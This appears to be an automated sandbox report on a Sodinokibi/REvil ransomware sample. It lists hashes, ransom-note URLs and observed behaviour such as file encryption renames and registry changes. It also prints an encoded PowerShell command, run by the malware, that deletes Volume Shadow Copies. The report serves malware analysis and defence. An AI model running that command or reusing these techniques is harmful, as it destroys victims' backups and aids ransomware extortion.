Analysis
-
max time kernel
138s -
max time network
115s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
20-08-2020 13:03
Static task
static1
Behavioral task
behavioral1
Sample
4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll
Resource
win7v200722
Behavioral task
behavioral2
Sample
4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll
Resource
win10
General
-
Target
4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll
-
Size
115KB
-
MD5
be926a24f4118fc23f09ce4ecd9ebff0
-
SHA1
4d6b8d954af01ff556aecb055f1965063ec3471e
-
SHA256
4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695
-
SHA512
278b8c39930f5cd98660b2f770452f227947800baaa07a8f583d26d67bd420e3a09f44f9c625068e18988d50318c0d5ed97dc0600b5e60ad803a222dab969ca7
Malware Config
Extracted
C:\h0qy8hq-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/51BF6F9E4FD08A9A
http://decryptor.cc/51BF6F9E4FD08A9A
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 156 IoCs
Processes:
rundll32.exeflow pid process 2 1504 rundll32.exe 4 1504 rundll32.exe 6 1504 rundll32.exe 8 1504 rundll32.exe 10 1504 rundll32.exe 11 1504 rundll32.exe 14 1504 rundll32.exe 15 1504 rundll32.exe 17 1504 rundll32.exe 19 1504 rundll32.exe 21 1504 rundll32.exe 22 1504 rundll32.exe 24 1504 rundll32.exe 25 1504 rundll32.exe 27 1504 rundll32.exe 28 1504 rundll32.exe 30 1504 rundll32.exe 32 1504 rundll32.exe 33 1504 rundll32.exe 35 1504 rundll32.exe 36 1504 rundll32.exe 38 1504 rundll32.exe 40 1504 rundll32.exe 41 1504 rundll32.exe 43 1504 rundll32.exe 45 1504 rundll32.exe 46 1504 rundll32.exe 48 1504 rundll32.exe 50 1504 rundll32.exe 52 1504 rundll32.exe 56 1504 rundll32.exe 58 1504 rundll32.exe 60 1504 rundll32.exe 61 1504 rundll32.exe 63 1504 rundll32.exe 64 1504 rundll32.exe 66 1504 rundll32.exe 67 1504 rundll32.exe 69 1504 rundll32.exe 70 1504 rundll32.exe 72 1504 rundll32.exe 73 1504 rundll32.exe 75 1504 rundll32.exe 76 1504 rundll32.exe 78 1504 rundll32.exe 79 1504 rundll32.exe 81 1504 rundll32.exe 83 1504 rundll32.exe 84 1504 rundll32.exe 86 1504 rundll32.exe 87 1504 rundll32.exe 89 1504 rundll32.exe 91 1504 rundll32.exe 93 1504 rundll32.exe 96 1504 rundll32.exe 97 1504 rundll32.exe 100 1504 rundll32.exe 102 1504 rundll32.exe 103 1504 rundll32.exe 105 1504 rundll32.exe 107 1504 rundll32.exe 109 1504 rundll32.exe 110 1504 rundll32.exe 112 1504 rundll32.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
rundll32.exedescription ioc process File renamed C:\Users\Admin\Pictures\StartComplete.tif => \??\c:\users\admin\pictures\StartComplete.tif.h0qy8hq rundll32.exe File renamed C:\Users\Admin\Pictures\TestReset.tiff => \??\c:\users\admin\pictures\TestReset.tiff.h0qy8hq rundll32.exe File renamed C:\Users\Admin\Pictures\UnblockRedo.tif => \??\c:\users\admin\pictures\UnblockRedo.tif.h0qy8hq rundll32.exe File opened for modification \??\c:\users\admin\pictures\TestReset.tiff rundll32.exe File renamed C:\Users\Admin\Pictures\MoveMeasure.png => \??\c:\users\admin\pictures\MoveMeasure.png.h0qy8hq rundll32.exe File renamed C:\Users\Admin\Pictures\PopJoin.tif => \??\c:\users\admin\pictures\PopJoin.tif.h0qy8hq rundll32.exe File renamed C:\Users\Admin\Pictures\RepairConvert.raw => \??\c:\users\admin\pictures\RepairConvert.raw.h0qy8hq rundll32.exe File renamed C:\Users\Admin\Pictures\ResumeUninstall.png => \??\c:\users\admin\pictures\ResumeUninstall.png.h0qy8hq rundll32.exe File renamed C:\Users\Admin\Pictures\SearchShow.png => \??\c:\users\admin\pictures\SearchShow.png.h0qy8hq rundll32.exe -
Enumerates connected drives 3 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt rundll32.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7jibdqgca48f.bmp" rundll32.exe -
Drops file in Program Files directory 37 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\program files\EnableDismount.css rundll32.exe File opened for modification \??\c:\program files\ResizeReset.wma rundll32.exe File opened for modification \??\c:\program files\ResumeTest.AAC rundll32.exe File opened for modification \??\c:\program files\DisableDebug.rtf rundll32.exe File opened for modification \??\c:\program files\UndoCompress.pub rundll32.exe File created \??\c:\program files\h0qy8hq-readme.txt rundll32.exe File created \??\c:\program files (x86)\h0qy8hq-readme.txt rundll32.exe File opened for modification \??\c:\program files\ConvertFromExit.pps rundll32.exe File opened for modification \??\c:\program files\ConvertFromPush.TTS rundll32.exe File opened for modification \??\c:\program files\ConvertFromSearch.vb rundll32.exe File opened for modification \??\c:\program files\PopBackup.m4a rundll32.exe File opened for modification \??\c:\program files\SaveInvoke.dib rundll32.exe File opened for modification \??\c:\program files\UninstallApprove.vssm rundll32.exe File opened for modification \??\c:\program files\RepairExport.pptx rundll32.exe File opened for modification \??\c:\program files\SavePop.ogg rundll32.exe File opened for modification \??\c:\program files\StopFormat.scf rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\h0qy8hq-readme.txt rundll32.exe File opened for modification \??\c:\program files\CompleteSplit.tif rundll32.exe File opened for modification \??\c:\program files\HideExpand.css rundll32.exe File opened for modification \??\c:\program files\ImportRemove.m3u rundll32.exe File opened for modification \??\c:\program files\SendRequest.png rundll32.exe File opened for modification \??\c:\program files\ReceiveOpen.mpg rundll32.exe File opened for modification \??\c:\program files\RenameSkip.wmv rundll32.exe File opened for modification \??\c:\program files\CompareRedo.wmf rundll32.exe File opened for modification \??\c:\program files\EditHide.TS rundll32.exe File opened for modification \??\c:\program files\LockSearch.ADT rundll32.exe File opened for modification \??\c:\program files\PopStop.vb rundll32.exe File opened for modification \??\c:\program files\UnprotectLock.vst rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\h0qy8hq-readme.txt rundll32.exe File opened for modification \??\c:\program files\BackupClose.tiff rundll32.exe File opened for modification \??\c:\program files\FormatInitialize.mht rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\h0qy8hq-readme.txt rundll32.exe File opened for modification \??\c:\program files\RepairEdit.temp rundll32.exe File opened for modification \??\c:\program files\CloseUnprotect.docx rundll32.exe File opened for modification \??\c:\program files\EditResume.au rundll32.exe File opened for modification \??\c:\program files\RestoreNew.mhtml rundll32.exe File opened for modification \??\c:\program files\SubmitInstall.au3 rundll32.exe -
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a919000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c02000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000002000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
rundll32.exepowershell.exepid process 1504 rundll32.exe 1600 powershell.exe 1600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1504 rundll32.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeBackupPrivilege 1876 vssvc.exe Token: SeRestorePrivilege 1876 vssvc.exe Token: SeAuditPrivilege 1876 vssvc.exe Token: SeTakeOwnershipPrivilege 1504 rundll32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1436 wrote to memory of 1504 1436 rundll32.exe rundll32.exe PID 1436 wrote to memory of 1504 1436 rundll32.exe rundll32.exe PID 1436 wrote to memory of 1504 1436 rundll32.exe rundll32.exe PID 1436 wrote to memory of 1504 1436 rundll32.exe rundll32.exe PID 1436 wrote to memory of 1504 1436 rundll32.exe rundll32.exe PID 1436 wrote to memory of 1504 1436 rundll32.exe rundll32.exe PID 1436 wrote to memory of 1504 1436 rundll32.exe rundll32.exe PID 1504 wrote to memory of 1600 1504 rundll32.exe powershell.exe PID 1504 wrote to memory of 1600 1504 rundll32.exe powershell.exe PID 1504 wrote to memory of 1600 1504 rundll32.exe powershell.exe PID 1504 wrote to memory of 1600 1504 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\4002b38c82cb339d1ccb434b5665389dfc33e0efb436bcc86928010797c89695.bin.exe.dll,#12⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1040
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1876